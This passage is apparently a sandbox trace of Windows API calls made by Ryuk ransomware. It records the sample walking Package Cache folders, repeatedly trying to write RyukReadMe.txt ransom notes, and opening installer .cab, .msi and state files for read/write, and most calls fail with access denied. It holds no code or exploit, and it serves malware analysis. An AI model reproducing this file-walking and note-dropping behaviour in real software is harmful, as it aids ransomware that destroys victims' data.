returned 0x5 [0159.764] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.764] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.764] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.764] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.764] SetLastError (dwErrCode=0x0) [0159.764] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.764] GetLastError () returned 0x5 [0159.764] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.764] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.765] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.765] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.765] SetLastError (dwErrCode=0x0) [0159.765] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.765] GetLastError () returned 0x5 [0159.765] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.765] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.765] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.765] SetLastError (dwErrCode=0x0) [0159.765] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.765] GetLastError () returned 0x5 [0159.765] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.765] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.765] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.765] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.765] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.765] SetLastError (dwErrCode=0x0) [0159.765] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.775] GetLastError () returned 0x5 [0159.775] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.775] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.775] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.776] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.776] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.776] SetLastError (dwErrCode=0x0) [0159.776] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.776] GetLastError () returned 0x5 [0159.776] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.776] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.776] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.776] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.776] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.776] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.777] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0159.777] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.777] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.777] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.777] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.777] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.778] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x80) returned 0 [0159.778] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.778] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.778] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.778] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.778] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.778] SetLastError (dwErrCode=0x0) [0159.778] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.779] GetLastError () returned 0x5 [0159.779] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.779] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.779] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.779] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.779] SetLastError (dwErrCode=0x0) [0159.779] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.779] GetLastError () returned 0x5 [0159.779] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.779] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.779] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.779] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.779] SetLastError (dwErrCode=0x0) [0159.779] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.779] GetLastError () returned 0x5 [0159.779] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.779] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.780] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.780] SetLastError (dwErrCode=0x0) [0159.780] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.780] GetLastError () returned 0x5 [0159.780] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.780] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.780] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.780] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.780] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.780] SetLastError (dwErrCode=0x0) [0159.780] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.780] GetLastError () returned 0x5 [0159.780] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.780] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.781] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.781] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.781] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.781] SetLastError (dwErrCode=0x0) [0159.781] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.781] GetLastError () returned 0x5 [0159.781] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.781] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.781] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.781] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.782] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.782] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.782] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0159.782] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.782] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.782] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.782] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.782] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.782] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.783] SetLastError (dwErrCode=0x0) [0159.783] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.783] GetLastError () returned 0x5 [0159.783] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.783] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.783] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.783] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.783] SetLastError (dwErrCode=0x0) [0159.783] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.783] GetLastError () returned 0x5 [0159.783] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.783] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.783] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.783] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.783] SetLastError (dwErrCode=0x0) [0159.784] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.784] GetLastError () returned 0x5 [0159.784] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.784] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.784] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.784] SetLastError (dwErrCode=0x0) [0159.784] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.784] GetLastError () returned 0x5 [0159.784] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.784] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.784] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.784] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.784] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.785] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.785] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", dwFileAttributes=0x80) returned 0 [0159.785] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.785] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.785] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.785] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.785] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.785] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.785] SetLastError (dwErrCode=0x0) [0159.785] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.786] GetLastError () returned 0x5 [0159.786] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.786] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.786] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.786] SetLastError (dwErrCode=0x0) [0159.786] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.786] GetLastError () returned 0x5 [0159.786] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.786] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.786] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.786] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.786] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.786] SetLastError (dwErrCode=0x0) [0159.787] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.787] GetLastError () returned 0x5 [0159.787] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.787] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.787] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.787] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.787] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.787] SetLastError (dwErrCode=0x0) [0159.787] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.787] GetLastError () returned 0x5 [0159.787] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 